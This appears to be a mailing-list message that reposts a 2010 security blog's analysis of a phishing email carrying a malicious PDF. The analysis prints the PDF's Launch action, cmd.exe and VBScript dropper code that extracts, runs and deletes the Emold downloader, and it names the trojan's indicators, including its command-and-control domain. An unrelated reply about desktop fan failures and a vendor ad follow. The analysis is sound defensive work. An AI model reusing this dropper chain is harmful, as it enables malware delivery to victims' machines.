http://www.secureworks.com/research/blog/index.php/2010/04/27/your-malware-setting-may-have-changed/
Last night and this morning a number of people received an email that looked liked this: From: [email protected] [mailto:[email protected]] Sent: Tuesday, April 27, 2010 7:47 AM To: [email protected] Subject: setting for your mailbox are changed SMTP and POP3 servers for [email protected] mailbox are changed. Please carefully read the attached instructions before updating settings. It contained a file called "doc.pdf". That file was, of course, malicious in nature. It used the PDF Launch vulnerability to run echo some commands into a bat file and then bootstrap itself to running the Emold downloader trojan. Let's take a look. 8 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo pf=f.ReadAll >> script.vbs && echo s=InStr(pf,"'SS") >> script.vbs && echo e=InStr(pf,"'EE") >> script.vbs && echo s=Mid(pf,s,e-s) >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True) >> script.vbs && echo s = Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs This uses cmd.exe to write some lines of text to a file called script.vbs and then executes script.vbs and batscript.vbs. Let's look at how script.vbs ends up: Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.OpenTextFile("doc.pdf", 1, True) echo pf=f.ReadAll echo s=InStr(pf,"'SS") echo e=InStr(pf,"'EE") s=Mid(pf,s,e-s) Set z=fso.OpenTextFile("batscript.vbs", 2, True) s = Replace(s,"%","") z.Write(s) When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to mark the beginning and end of a section of the pdf. It grabs that section, does a little bit of text manipulation and then writes the result to batscript.vbs. Next let's look what's in that tagged section of doc.pdf (that ends up batscript.vbs): 5 0 obj << /Length 46 >> stream BT /F1 34 Tf 50 500 Td (Important Information doc.pdf)Tj %'SS %Dim b %Function c(d) %c=chr(d) %End Function %b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000), c(004),c(000),c(000)... ...this line is 248413 characters long... ...c(000),c(000),c(000),c(000 ),"") %Set fso = CreateObject("Scripting.FileSystemObject") %Set f = fso.OpenTextFile("game.exe", 2, True) %For i = 0 To 35328 %f.write(b(i)) %Next %f.close() %Set WshShell = WScript.CreateObject("WScript.Shell") %WshShell.Run "cmd.exe /c game.exe" %WScript.Sleep 3000 %Set f = FSO.GetFile("game.exe") %f.Delete %Set f = FSO.GetFile("batscript.vbs") %f.Delete %Set f = FSO.GetFile("script.vbs") %f.Delete %'EE endstream We can now see that the array stored in b is actually an obfuscated executable file that is stored in game.exe. After running game.exe this script (executed in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, and script.vbs. Game.exe is the Elmod trojan. This is a generic downloader which can be used to install any number of second stage trojans. It can be identified by the presence of the file C:/Program Files/Microsoft Common/svchost.exe, the registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe", and because it phones home to (currently) jademason.com. Adobe has said that the Launch functionality is a feature, not a bug. Adobe is looking into the issue, but has not said what action, if any, they intended to take to mitigate the danger. Their post on the matter does include directions for turning off this functionality. This entry was posted on Tuesday, April 27th, 2010 at 6:24 pm. Edward Ziots CISSP,MCSA,MCP+I,Security +,Network +,CCA Network Engineer Lifespan Organization 401-639-3505 [email protected] From: Ralph Smith [mailto:[email protected]] Sent: Wednesday, April 28, 2010 2:38 PM To: NT System Admin Issues Subject: RE: Low-profile desktop Ethernet adapters We have about 35 GX520 Small Form Factor computers here. Out of those we have had 2 motherboards replaced, but the biggest problem has been the fan in the power supply - I think we are up to about a dozen of them gone bad so far. Since they are all out of warranty now, we're just replacing the fans as they go bad. ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
